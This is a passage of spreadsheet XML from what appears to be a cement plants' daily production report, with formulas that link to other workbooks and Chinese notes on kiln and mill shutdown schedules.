      <c r="Y40" s="235">
        <f>'[10]3'!$X$44</f>
        <v>0</v>
      </c>
      <c r="Z40" s="238">
        <f>'[10]3'!$Y$44</f>
        <v>0</v>
      </c>
    </row>
    <row r="41" ht="15.75" customHeight="1" spans="1:26">
      <c r="A41" s="191" t="s">
        <v>252</v>
      </c>
      <c r="B41" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C41" s="193"/>
      <c r="D41" s="193"/>
      <c r="E41" s="194">
        <v>12000</v>
      </c>
      <c r="F41" s="194">
        <f>'[12]3'!$D$16</f>
        <v>26129.76</v>
      </c>
      <c r="G41" s="225">
        <f>'[12]3'!$E$16</f>
        <v>0</v>
      </c>
      <c r="H41" s="194">
        <f>G41+'2'!H41</f>
        <v>0</v>
      </c>
      <c r="I41" s="194">
        <f>H41+yc!I41</f>
        <v>124976</v>
      </c>
      <c r="J41" s="194">
        <f>'[12]3'!$I$16</f>
        <v>434.5</v>
      </c>
      <c r="K41" s="194">
        <f>J41+'2'!K41</f>
        <v>1193</v>
      </c>
      <c r="L41" s="194">
        <f>K41+yc!L41</f>
        <v>122586.54</v>
      </c>
      <c r="M41" s="194">
        <f>'[12]3'!$L$16</f>
        <v>24936.76</v>
      </c>
      <c r="N41" s="195">
        <f>M41/30000*100</f>
        <v>83.1225333333333</v>
      </c>
      <c r="O41" s="200"/>
      <c r="P41" s="213" t="s">
        <v>237</v>
      </c>
      <c r="Q41" s="191" t="s">
        <v>277</v>
      </c>
      <c r="R41" s="239">
        <f>'[11]3'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S41" s="240">
        <f>'[11]3'!$Q$7</f>
        <v>0.621</v>
      </c>
      <c r="T41" s="238">
        <f>'[11]3'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U41" s="234">
        <f>T41+'2'!U41</f>
        <v>0</v>
      </c>
      <c r="V41" s="234">
        <f>U41+yc!V41</f>
        <v>0.621000000000095</v>
      </c>
      <c r="W41" s="235">
        <f>'[11]3'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X41" s="234">
        <f>W41+'2'!X41</f>
        <v>0</v>
      </c>
      <c r="Y41" s="235">
        <f>X41+yc!Y41</f>
        <v>9.45910016980633e-14</v>
      </c>
      <c r="Z41" s="238">
        <f>'[11]3'!$Y$7</f>
        <v>0.621</v>
      </c>
    </row>
    <row r="42" ht="15.75" customHeight="1" spans="1:26">
      <c r="A42" s="191"/>
      <c r="B42" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C42" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D42" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E42" s="194">
        <v>0</v>
      </c>
      <c r="F42" s="194">
        <f>'[12]3'!$D$13</f>
        <v>0</v>
      </c>
      <c r="G42" s="225">
        <f>'[12]3'!$E$13</f>
        <v>0</v>
      </c>
      <c r="H42" s="194">
        <f>G42+'2'!H42</f>
        <v>0</v>
      </c>
      <c r="I42" s="194">
        <f>H42+yc!I42</f>
        <v>0</v>
      </c>
      <c r="J42" s="194">
        <f>'[12]3'!$I$13</f>
        <v>0</v>
      </c>
      <c r="K42" s="194">
        <f>J42+'2'!K42</f>
        <v>0</v>
      </c>
      <c r="L42" s="194">
        <f>K42+yc!L42</f>
        <v>0</v>
      </c>
      <c r="M42" s="194">
        <f>'[12]3'!$L$13</f>
        <v>0</v>
      </c>
      <c r="N42" s="207">
        <f>(M42+M43)/50000*100</f>
        <v>0</v>
      </c>
      <c r="O42" s="200"/>
      <c r="P42" s="215"/>
      <c r="Q42" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R42" s="237">
        <f>'[11]3'!$P$8</f>
        <v>14000</v>
      </c>
      <c r="S42" s="238">
        <f>'[11]3'!$Q$8</f>
        <v>8478.836</v>
      </c>
      <c r="T42" s="238">
        <f>'[11]3'!$R$8</f>
        <v>1555.8</v>
      </c>
      <c r="U42" s="234">
        <f>T42+'2'!U42</f>
        <v>2592.9</v>
      </c>
      <c r="V42" s="235">
        <f>U42+yc!V42</f>
        <v>210179.87</v>
      </c>
      <c r="W42" s="235">
        <f>'[11]3'!$V$8</f>
        <v>0</v>
      </c>
      <c r="X42" s="234">
        <f>W42+'2'!X42</f>
        <v>221</v>
      </c>
      <c r="Y42" s="235">
        <f>X42+yc!Y42</f>
        <v>202692</v>
      </c>
      <c r="Z42" s="238">
        <f>'[11]3'!$Y$8</f>
        <v>10850.736</v>
      </c>
    </row>
    <row r="43" ht="15.75" customHeight="1" spans="1:26">
      <c r="A43" s="191"/>
      <c r="B43" s="193"/>
      <c r="C43" s="193"/>
      <c r="D43" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E43" s="194"/>
      <c r="F43" s="194">
        <f>'[12]3'!$D$14</f>
        <v>0</v>
      </c>
      <c r="G43" s="225">
        <f>'[12]3'!$E$14</f>
        <v>0</v>
      </c>
      <c r="H43" s="194">
        <f>G43+'2'!H43</f>
        <v>0</v>
      </c>
      <c r="I43" s="194">
        <f>H43+yc!I43</f>
        <v>0</v>
      </c>
      <c r="J43" s="194">
        <f>'[12]3'!$I$14</f>
        <v>0</v>
      </c>
      <c r="K43" s="194">
        <f>J43+'2'!K43</f>
        <v>0</v>
      </c>
      <c r="L43" s="194">
        <f>K43+yc!L43</f>
        <v>0</v>
      </c>
      <c r="M43" s="194">
        <f>'[12]3'!$L$14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'[12]3'!$E$44</f>
        <v>0</v>
      </c>
      <c r="H44" s="194">
        <f>G44+'2'!H44</f>
        <v>0</v>
      </c>
      <c r="I44" s="194">
        <f>H44+yc!I44</f>
        <v>128550.22</v>
      </c>
      <c r="J44" s="194">
        <f>'[12]3'!$I$44</f>
        <v>0</v>
      </c>
      <c r="K44" s="194">
        <f>J44+'2'!K44</f>
        <v>0</v>
      </c>
      <c r="L44" s="194">
        <f>K44+yc!L44</f>
        <v>0</v>
      </c>
      <c r="M44" s="194">
        <f>'[12]3'!$L$15</f>
        <v>67564.78</v>
      </c>
      <c r="N44" s="195"/>
      <c r="O44" s="200"/>
      <c r="P44" s="215"/>
      <c r="Q44" s="191" t="s">
        <v>279</v>
      </c>
      <c r="R44" s="237">
        <f>'[11]3'!$P$29</f>
        <v>8000</v>
      </c>
      <c r="S44" s="238">
        <f>'[11]3'!$Q$29</f>
        <v>2299.457</v>
      </c>
      <c r="T44" s="238">
        <f>'[11]3'!$R$29</f>
        <v>0</v>
      </c>
      <c r="U44" s="234">
        <f>T44+'2'!U44</f>
        <v>0</v>
      </c>
      <c r="V44" s="235">
        <f>U44+yc!V44</f>
        <v>64753.168</v>
      </c>
      <c r="W44" s="235">
        <f>'[11]3'!$V$29</f>
        <v>161</v>
      </c>
      <c r="X44" s="234">
        <f>W44+'2'!X44</f>
        <v>388</v>
      </c>
      <c r="Y44" s="235">
        <f>X44+yc!Y44</f>
        <v>66798</v>
      </c>
      <c r="Z44" s="238">
        <f>'[11]3'!$Y$29</f>
        <v>1911.457</v>
      </c>
    </row>
    <row r="45" ht="15.75" customHeight="1" spans="1:26">
      <c r="A45" s="191"/>
      <c r="B45" s="193"/>
      <c r="C45" s="193"/>
      <c r="D45" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E45" s="194"/>
      <c r="F45" s="194"/>
      <c r="G45" s="225">
        <f>'[12]3'!$E$55</f>
        <v>0</v>
      </c>
      <c r="H45" s="194">
        <f>G45+'2'!H45</f>
        <v>0</v>
      </c>
      <c r="I45" s="194">
        <f>H45+yc!I45</f>
        <v>0</v>
      </c>
      <c r="J45" s="225">
        <f>'[12]3'!$I$55</f>
        <v>0</v>
      </c>
      <c r="K45" s="194">
        <f>J45+'2'!K45</f>
        <v>0</v>
      </c>
      <c r="L45" s="194">
        <f>K45+yc!L45</f>
        <v>0</v>
      </c>
      <c r="M45" s="194"/>
      <c r="N45" s="195"/>
      <c r="O45" s="200"/>
      <c r="P45" s="214"/>
      <c r="Q45" s="191" t="s">
        <v>280</v>
      </c>
      <c r="R45" s="237">
        <f>'[11]3'!$P$23</f>
        <v>0</v>
      </c>
      <c r="S45" s="238">
        <f>'[11]3'!$Q$23</f>
        <v>0</v>
      </c>
      <c r="T45" s="238">
        <f>'[11]3'!$R$23</f>
        <v>0</v>
      </c>
      <c r="U45" s="234">
        <f>'[11]3'!$S$23</f>
        <v>0</v>
      </c>
      <c r="V45" s="235">
        <f>'[11]3'!$T$23</f>
        <v>1.329</v>
      </c>
      <c r="W45" s="235">
        <f>'[11]3'!$V$23</f>
        <v>0</v>
      </c>
      <c r="X45" s="234">
        <f>'[11]3'!$W$23</f>
        <v>0</v>
      </c>
      <c r="Y45" s="235">
        <f>'[11]3'!$X$23</f>
        <v>1.329</v>
      </c>
      <c r="Z45" s="238">
        <f>'[11]3'!$Y$23</f>
        <v>0</v>
      </c>
    </row>
    <row r="46" ht="15.75" customHeight="1" spans="1:26">
      <c r="A46" s="191"/>
      <c r="B46" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C46" s="193"/>
      <c r="D46" s="193"/>
      <c r="E46" s="194"/>
      <c r="F46" s="194"/>
      <c r="G46" s="194"/>
      <c r="H46" s="194">
        <f>G46+'2'!H46</f>
        <v>0</v>
      </c>
      <c r="I46" s="194">
        <f>H46+yc!I46</f>
        <v>0</v>
      </c>
      <c r="J46" s="194">
        <f>J47+J50</f>
        <v>0</v>
      </c>
      <c r="K46" s="194">
        <f>J46+'2'!K46</f>
        <v>0</v>
      </c>
      <c r="L46" s="194">
        <f>K46+yc!L46</f>
        <v>0</v>
      </c>
      <c r="M46" s="194"/>
      <c r="N46" s="195"/>
      <c r="O46" s="200"/>
      <c r="P46" s="242" t="s">
        <v>252</v>
      </c>
      <c r="Q46" s="193" t="s">
        <v>277</v>
      </c>
      <c r="R46" s="237">
        <f>'[12]3'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S46" s="238">
        <f>'[12]3'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T46" s="238">
        <f>'[12]3'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U46" s="234">
        <f>T46+'2'!U46</f>
        <v>0</v>
      </c>
      <c r="V46" s="234">
        <f>U46+yc!V46</f>
        <v>0</v>
      </c>
      <c r="W46" s="235">
        <f>'[12]3'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X46" s="234">
        <f>W46+'2'!X46</f>
        <v>0</v>
      </c>
      <c r="Y46" s="235">
        <f>X46+yc!Y46</f>
        <v>0</v>
      </c>
      <c r="Z46" s="238">
        <f>'[12]3'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="47" ht="15.75" customHeight="1" spans="1:26">
      <c r="A47" s="191"/>
      <c r="B47" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C47" s="193"/>
      <c r="D47" s="193"/>
      <c r="E47" s="194">
        <v>12000</v>
      </c>
      <c r="F47" s="194"/>
      <c r="G47" s="225"/>
      <c r="H47" s="194">
        <f>G47+'2'!H47</f>
        <v>0</v>
      </c>
      <c r="I47" s="194">
        <f>H47+yc!I47</f>
        <v>0</v>
      </c>
      <c r="J47" s="194">
        <f>SUM(J48:J49)</f>
        <v>0</v>
      </c>
      <c r="K47" s="194">
        <f>J47+'2'!K47</f>
        <v>0</v>
      </c>
      <c r="L47" s="194">
        <f>K47+yc!L47</f>
        <v>0</v>
      </c>
      <c r="M47" s="194"/>
      <c r="N47" s="195"/>
      <c r="O47" s="200"/>
      <c r="P47" s="243"/>
      <c r="Q47" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R47" s="237">
        <f>'[12]3'!$P$8</f>
        <v>0</v>
      </c>
      <c r="S47" s="238">
        <f>'[12]3'!$Q$8</f>
        <v>0</v>
      </c>
      <c r="T47" s="238">
        <f>'[12]3'!$R$8</f>
        <v>0</v>
      </c>
      <c r="U47" s="234">
        <f>T47+'2'!U47</f>
        <v>0</v>
      </c>
      <c r="V47" s="234">
        <f>U47+yc!V47</f>
        <v>0</v>
      </c>
      <c r="W47" s="235">
        <f>'[12]3'!$V$8</f>
        <v>0</v>
      </c>
      <c r="X47" s="234">
        <f>W47+'2'!X47</f>
        <v>0</v>
      </c>
      <c r="Y47" s="235">
        <f>X47+yc!Y47</f>
        <v>0</v>
      </c>
      <c r="Z47" s="238">
        <f>'[12]3'!$Y$8</f>
        <v>0</v>
      </c>
    </row>
    <row r="48" ht="15.75" customHeight="1" spans="1:26">
      <c r="A48" s="191"/>
      <c r="B48" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C48" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D48" s="193"/>
      <c r="E48" s="194"/>
      <c r="F48" s="194"/>
      <c r="G48" s="225"/>
      <c r="H48" s="194">
        <f>G48+'2'!H48</f>
        <v>0</v>
      </c>
      <c r="I48" s="194">
        <f>H48+yc!I48</f>
        <v>0</v>
      </c>
      <c r="J48" s="194"/>
      <c r="K48" s="194">
        <f>J48+'2'!K48</f>
        <v>0</v>
      </c>
      <c r="L48" s="194">
        <f>K48+yc!L48</f>
        <v>0</v>
      </c>
      <c r="M48" s="194"/>
      <c r="N48" s="195"/>
      <c r="O48" s="200"/>
      <c r="P48" s="243"/>
      <c r="Q48" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R48" s="237">
        <f>'[12]3'!$P$34</f>
        <v>0</v>
      </c>
      <c r="S48" s="238">
        <f>'[12]3'!$Q$34</f>
        <v>1585.503</v>
      </c>
      <c r="T48" s="238">
        <f>'[12]3'!$R$34</f>
        <v>0</v>
      </c>
      <c r="U48" s="234">
        <f>T48+'2'!U48</f>
        <v>0</v>
      </c>
      <c r="V48" s="234">
        <f>U48+yc!V48</f>
        <v>6026.53</v>
      </c>
      <c r="W48" s="235">
        <f>'[12]3'!$V$8</f>
        <v>0</v>
      </c>
      <c r="X48" s="234">
        <f>W48+'2'!X48</f>
        <v>0</v>
      </c>
      <c r="Y48" s="235">
        <f>X48+yc!Y48</f>
        <v>0</v>
      </c>
      <c r="Z48" s="238">
        <f>'[12]3'!$Y$8</f>
        <v>0</v>
      </c>
    </row>
    <row r="49" ht="15.75" customHeight="1" spans="1:26">
      <c r="A49" s="191"/>
      <c r="B49" s="191"/>
      <c r="C49" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D49" s="193"/>
      <c r="E49" s="194"/>
      <c r="F49" s="194"/>
      <c r="G49" s="194"/>
      <c r="H49" s="194">
        <f>G49+'2'!H49</f>
        <v>0</v>
      </c>
      <c r="I49" s="194">
        <f>H49+yc!I49</f>
        <v>0</v>
      </c>
      <c r="J49" s="194"/>
      <c r="K49" s="194">
        <f>J49+'2'!K49</f>
        <v>0</v>
      </c>
      <c r="L49" s="194">
        <f>K49+yc!L49</f>
        <v>0</v>
      </c>
      <c r="M49" s="194"/>
      <c r="N49" s="195"/>
      <c r="O49" s="200"/>
      <c r="P49" s="197" t="s">
        <v>304</v>
      </c>
      <c r="Q49" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R49" s="237">
        <f>'[13]3'!$P$8</f>
        <v>15340</v>
      </c>
      <c r="S49" s="238">
        <f>'[13]3'!$Q$8</f>
        <v>10593.625</v>
      </c>
      <c r="T49" s="238">
        <f>'[13]3'!$R$8</f>
        <v>0</v>
      </c>
      <c r="U49" s="234">
        <f>T49+'2'!U49</f>
        <v>0</v>
      </c>
      <c r="V49" s="234">
        <f>U49+yc!V49</f>
        <v>179888.95</v>
      </c>
      <c r="W49" s="235">
        <f>'[13]3'!$V$8</f>
        <v>0</v>
      </c>
      <c r="X49" s="234">
        <f>W49+'2'!X49</f>
        <v>0</v>
      </c>
      <c r="Y49" s="235">
        <f>X49+yc!Y49</f>
        <v>176530.34</v>
      </c>
      <c r="Z49" s="238">
        <f>'[13]3'!$Y$8</f>
        <v>10593.625</v>
      </c>
    </row>
    <row r="50" ht="15.75" customHeight="1" spans="1:26">
      <c r="A50" s="191"/>
      <c r="B50" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C50" s="193"/>
      <c r="D50" s="193"/>
      <c r="E50" s="194"/>
      <c r="F50" s="194"/>
      <c r="G50" s="225"/>
      <c r="H50" s="194">
        <f>G50+'2'!H50</f>
        <v>0</v>
      </c>
      <c r="I50" s="194">
        <f>H50+yc!I50</f>
        <v>0</v>
      </c>
      <c r="J50" s="194"/>
      <c r="K50" s="194">
        <f>J50+'2'!K50</f>
        <v>0</v>
      </c>
      <c r="L50" s="194">
        <f>K50+yc!L50</f>
        <v>0</v>
      </c>
      <c r="M50" s="194"/>
      <c r="N50" s="195"/>
      <c r="O50" s="200"/>
      <c r="P50" s="200"/>
      <c r="Q50" s="193" t="s">
        <v>277</v>
      </c>
      <c r="R50" s="237">
        <f>'[13]3'!$P$7</f>
        <v>200</v>
      </c>
      <c r="S50" s="238">
        <f>'[13]3'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T50" s="238">
        <f>'[13]3'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U50" s="234">
        <f>T50+'2'!U50</f>
        <v>0</v>
      </c>
      <c r="V50" s="234">
        <f>U50+yc!V50</f>
        <v>0</v>
      </c>
      <c r="W50" s="235">
        <f>'[13]3'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X50" s="234">
        <f>W50+'2'!X50</f>
        <v>0</v>
      </c>
      <c r="Y50" s="235">
        <f>X50+yc!Y50</f>
        <v>0</v>
      </c>
      <c r="Z50" s="238">
        <f>'[13]3'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="51" ht="15.75" customHeight="1" spans="1:26">
      <c r="A51" s="191" t="s">
        <v>304</v>
      </c>
      <c r="B51" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C51" s="193"/>
      <c r="D51" s="193"/>
      <c r="E51" s="194">
        <v>160000</v>
      </c>
      <c r="F51" s="194">
        <f>'[13]3'!$D$24</f>
        <v>48852.6839999998</v>
      </c>
      <c r="G51" s="225">
        <f>'[13]3'!$E$24</f>
        <v>5560</v>
      </c>
      <c r="H51" s="194">
        <f>G51+'2'!H51</f>
        <v>15362</v>
      </c>
      <c r="I51" s="194">
        <f>H51+yc!I51</f>
        <v>1391761</v>
      </c>
      <c r="J51" s="194">
        <f>'[13]3'!$I$24</f>
        <v>5285.163</v>
      </c>
      <c r="K51" s="194">
        <f>J51+'2'!K51</f>
        <v>17865.843</v>
      </c>
      <c r="L51" s="194">
        <f>K51+yc!L51</f>
        <v>1380989.774</v>
      </c>
      <c r="M51" s="194">
        <f>'[13]3'!$L$24</f>
        <v>46348.8409999998</v>
      </c>
      <c r="N51" s="195">
        <f>M51/45000*100</f>
        <v>102.997424444444</v>
      </c>
      <c r="O51" s="200"/>
      <c r="P51" s="200"/>
      <c r="Q51" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R51" s="237">
        <f>'[13]3'!$P$30</f>
        <v>8550</v>
      </c>
      <c r="S51" s="238">
        <f>'[13]3'!$Q$30</f>
        <v>3251.37400000001</v>
      </c>
      <c r="T51" s="238">
        <f>'[13]3'!$R$30</f>
        <v>110.24</v>
      </c>
      <c r="U51" s="234">
        <f>T51+'2'!U51</f>
        <v>714.1</v>
      </c>
      <c r="V51" s="234">
        <f>U51+yc!V51</f>
        <v>63712.571</v>
      </c>
      <c r="W51" s="235">
        <f>'[13]3'!$V$30</f>
        <v>236.68</v>
      </c>
      <c r="X51" s="234">
        <f>W51+'2'!X51</f>
        <v>661.188</v>
      </c>
      <c r="Y51" s="235">
        <f>X51+yc!Y51</f>
        <v>61277.425</v>
      </c>
      <c r="Z51" s="238">
        <f>'[13]3'!$Y$30</f>
        <v>3304.28600000001</v>
      </c>
    </row>
    <row r="52" ht="15.75" customHeight="1" spans="1:26">
      <c r="A52" s="191"/>
      <c r="B52" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C52" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D52" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E52" s="194">
        <v>175000</v>
      </c>
      <c r="F52" s="194">
        <f>'[13]3'!$D$19</f>
        <v>105046.44300005</v>
      </c>
      <c r="G52" s="225">
        <f>'[13]3'!$E$19</f>
        <v>2e-11</v>
      </c>
      <c r="H52" s="194">
        <f>G52+'2'!H52</f>
        <v>6e-11</v>
      </c>
      <c r="I52" s="194">
        <f>H52+yc!I52</f>
        <v>1383567.25</v>
      </c>
      <c r="J52" s="194">
        <f>'[13]3'!$I$19</f>
        <v>5626.95</v>
      </c>
      <c r="K52" s="194">
        <f>J52+'2'!K52</f>
        <v>14033.421</v>
      </c>
      <c r="L52" s="194">
        <f>K52+yc!L52</f>
        <v>1295727.621</v>
      </c>
      <c r="M52" s="194">
        <f>'[13]3'!$L$19</f>
        <v>91013.0220000503</v>
      </c>
      <c r="N52" s="207">
        <f>(M52+M53)/(65000+80000)*100</f>
        <v>62.767601379345</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'[13]3'!$D$22</f>
        <v>0</v>
      </c>
      <c r="G53" s="225">
        <f>'[13]3'!$E$22</f>
        <v>0</v>
      </c>
      <c r="H53" s="194">
        <f>G53+'2'!H53</f>
        <v>0</v>
      </c>
      <c r="I53" s="194">
        <f>H53+yc!I53</f>
        <v>0</v>
      </c>
      <c r="J53" s="194">
        <f>'[13]3'!$I$22</f>
        <v>0</v>
      </c>
      <c r="K53" s="194">
        <f>J53+'2'!K53</f>
        <v>0</v>
      </c>
      <c r="L53" s="194">
        <f>K53+yc!L53</f>
        <v>0</v>
      </c>
      <c r="M53" s="194">
        <f>'[13]3'!$L$23</f>
        <v>0</v>
      </c>
      <c r="N53" s="212"/>
      <c r="O53" s="200"/>
      <c r="P53" s="223" t="s">
        <v>262</v>
      </c>
      <c r="Q53" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R53" s="245"/>
      <c r="S53" s="237">
        <f>'[14]3'!$M$21+'[14]3'!$M$22+'[14]3'!$M$35</f>
        <v>1648.947</v>
      </c>
      <c r="T53" s="237">
        <f>'[14]3'!$N$21+'[14]3'!$N$22+'[14]3'!$N$35</f>
        <v>42.74</v>
      </c>
      <c r="U53" s="234">
        <f>T53+'2'!U53</f>
        <v>130.57</v>
      </c>
      <c r="V53" s="234">
        <f>U53+yc!V53</f>
        <v>38464.997</v>
      </c>
      <c r="W53" s="237">
        <f>'[14]3'!$Q$21+'[14]3'!$Q$22+'[14]3'!$Q$35</f>
        <v>85</v>
      </c>
      <c r="X53" s="234">
        <f>W53+'2'!X53</f>
        <v>217</v>
      </c>
      <c r="Y53" s="235">
        <f>X53+yc!Y53</f>
        <v>39708</v>
      </c>
      <c r="Z53" s="237">
        <f>'[14]3'!$T$21+'[14]3'!$T$22+'[14]3'!$T$35</f>
        <v>1562.517</v>
      </c>
    </row>
    <row r="54" ht="15.75" customHeight="1" spans="1:26">
      <c r="A54" s="191"/>
      <c r="B54" s="193"/>
      <c r="C54" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D54" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E54" s="194"/>
      <c r="F54" s="194"/>
      <c r="G54" s="225">
        <f>'[13]3'!$E$23</f>
        <v>0</v>
      </c>
      <c r="H54" s="194">
        <f>G54+'2'!H54</f>
        <v>0</v>
      </c>
      <c r="I54" s="194">
        <f>H54+yc!I54</f>
        <v>0</v>
      </c>
      <c r="J54" s="194">
        <f>'[13]3'!$I$47</f>
        <v>1347.34</v>
      </c>
      <c r="K54" s="194">
        <f>J54+'2'!K54</f>
        <v>2455.226</v>
      </c>
      <c r="L54" s="194">
        <f>K54+yc!L54</f>
        <v>213897.076</v>
      </c>
      <c r="M54" s="194">
        <f>'[13]3'!$L$22</f>
        <v>0</v>
      </c>
      <c r="N54" s="195"/>
      <c r="O54" s="200"/>
      <c r="P54" s="246" t="s">
        <v>263</v>
      </c>
      <c r="Q54" s="242" t="s">
        <v>279</v>
      </c>
      <c r="R54" s="247">
        <f>'[15]3'!$C$43</f>
        <v>0</v>
      </c>
      <c r="S54" s="247">
        <f>'[15]3'!$D$43</f>
        <v>467.66</v>
      </c>
      <c r="T54" s="247">
        <f>'[15]3'!$E$43</f>
        <v>0</v>
      </c>
      <c r="U54" s="234">
        <f>T54+'2'!U54</f>
        <v>0</v>
      </c>
      <c r="V54" s="248">
        <f>U54+yc!V54</f>
        <v>0</v>
      </c>
      <c r="W54" s="249">
        <f>'[15]3'!$H$43</f>
        <v>0</v>
      </c>
      <c r="X54" s="234">
        <f>W54+'2'!X54</f>
        <v>0</v>
      </c>
      <c r="Y54" s="250">
        <f>X54+yc!Y54</f>
        <v>0</v>
      </c>
      <c r="Z54" s="247">
        <f>'[15]3'!$K$43</f>
        <v>467.66</v>
      </c>
    </row>
    <row r="55" ht="15.75" customHeight="1" spans="1:26">
      <c r="A55" s="191"/>
      <c r="B55" s="193"/>
      <c r="C55" s="193"/>
      <c r="D55" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E55" s="194"/>
      <c r="F55" s="194"/>
      <c r="G55" s="225">
        <f>'[13]3'!$E$63</f>
        <v>0</v>
      </c>
      <c r="H55" s="194">
        <f>G55+'2'!H55</f>
        <v>0</v>
      </c>
      <c r="I55" s="194">
        <f>H55+yc!I55</f>
        <v>0</v>
      </c>
      <c r="J55" s="225">
        <f>'[13]3'!$I$63</f>
        <v>0</v>
      </c>
      <c r="K55" s="194">
        <f>J55+'2'!K55</f>
        <v>0</v>
      </c>
      <c r="L55" s="194">
        <f>K55+yc!L55</f>
        <v>35435.65</v>
      </c>
      <c r="M55" s="194"/>
      <c r="N55" s="195"/>
      <c r="O55" s="200"/>
      <c r="P55" s="251" t="s">
        <v>310</v>
      </c>
      <c r="Q55" s="252" t="s">
        <v>279</v>
      </c>
      <c r="R55" s="253">
        <f>'[16]3'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S55" s="253">
        <f>'[16]3'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T55" s="253">
        <f>'[16]3'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U55" s="254">
        <f>'[16]3'!$S$7</f>
        <v>0</v>
      </c>
      <c r="V55" s="255">
        <f>'[16]3'!$T$7</f>
        <v>0</v>
      </c>
      <c r="W55" s="256">
        <f>'[16]3'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X55" s="254">
        <f>'[16]3'!$W$7</f>
        <v>0</v>
      </c>
      <c r="Y55" s="257">
        <f>'[16]3'!$X$7</f>
        <v>0</v>
      </c>
      <c r="Z55" s="253">
        <f>'[16]3'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="56" ht="15.75" customHeight="1" spans="1:26">
      <c r="A56" s="191"/>
      <c r="B56" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C56" s="193"/>
      <c r="D56" s="193"/>
      <c r="E56" s="194"/>
      <c r="F56" s="194"/>
      <c r="G56" s="194"/>
      <c r="H56" s="194">
        <f>G56+'2'!H56</f>
        <v>0</v>
      </c>
      <c r="I56" s="194">
        <f>H56+yc!I56</f>
        <v>0</v>
      </c>
      <c r="J56" s="194">
        <f>J57+J60</f>
        <v>0</v>
      </c>
      <c r="K56" s="194">
        <f>J56+'2'!K56</f>
        <v>0</v>
      </c>
      <c r="L56" s="194">
        <f>K56+yc!L56</f>
        <v>0</v>
      </c>
      <c r="M56" s="194"/>
      <c r="N56" s="195"/>
      <c r="O56" s="258" t="s">
        <v>282</v>
      </c>
      <c r="P56" s="259" t="s">
        <v>229</v>
      </c>
      <c r="Q56" s="260" t="str">
        <f>'[8]3'!$Q$62</f>
        <v>1#窑:正常。2#窑:续停。水泥磨:1#磨：10:00-23:10避峰停机；2#磨：10:00-22:30避峰停机；3#磨：9:20-22:10避峰停机；4#磨：大修续停。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G57+'2'!H57</f>
        <v>0</v>
      </c>
      <c r="I57" s="194">
        <f>H57+yc!I57</f>
        <v>0</v>
      </c>
      <c r="J57" s="194">
        <f>SUM(J58:J59)</f>
        <v>0</v>
      </c>
      <c r="K57" s="194">
        <f>J57+'2'!K57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G58+'2'!H58</f>
        <v>0</v>
      </c>
      <c r="I58" s="194">
        <f>H58+yc!I58</f>
        <v>0</v>
      </c>
      <c r="J58" s="194"/>
      <c r="K58" s="194">
        <f>J58+'2'!K58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G59+'2'!H59</f>
        <v>0</v>
      </c>
      <c r="I59" s="194">
        <f>H59+yc!I59</f>
        <v>0</v>
      </c>
      <c r="J59" s="194"/>
      <c r="K59" s="194">
        <f>J59+'2'!K59</f>
        <v>0</v>
      </c>
      <c r="L59" s="194">
        <f>K59+yc!L59</f>
        <v>0</v>
      </c>
      <c r="M59" s="194"/>
      <c r="N59" s="195"/>
      <c r="O59" s="263"/>
      <c r="P59" s="264" t="s">
        <v>237</v>
      </c>
      <c r="Q59" s="271" t="str">
        <f>'[8]3'!$Q$65</f>
        <v>窑:0:00-6:03续停，6:03-24:00转错峰停机（错峰）。A组磨：11:40-24:00避峰停机。D1#磨：9:00-24:00避峰停机，D2#磨：9:00-24:00避峰停机。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G60+'2'!H60</f>
        <v>0</v>
      </c>
      <c r="I60" s="194">
        <f>H60+yc!I60</f>
        <v>0</v>
      </c>
      <c r="J60" s="194"/>
      <c r="K60" s="194">
        <f>J60+'2'!K60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'[14]3'!$D$6</f>
        <v>37769.1699999999</v>
      </c>
      <c r="G61" s="225">
        <f>'[14]3'!$E$6</f>
        <v>2401</v>
      </c>
      <c r="H61" s="194">
        <f>G61+'2'!H61</f>
        <v>7568</v>
      </c>
      <c r="I61" s="194">
        <f>H61+yc!I61</f>
        <v>1123441</v>
      </c>
      <c r="J61" s="194">
        <f>'[14]3'!$E$21</f>
        <v>3263.62</v>
      </c>
      <c r="K61" s="194">
        <f>J61+'2'!K61</f>
        <v>10335.08</v>
      </c>
      <c r="L61" s="194">
        <f>K61+yc!L61</f>
        <v>1111495.16</v>
      </c>
      <c r="M61" s="194">
        <f>'[14]3'!$H$6</f>
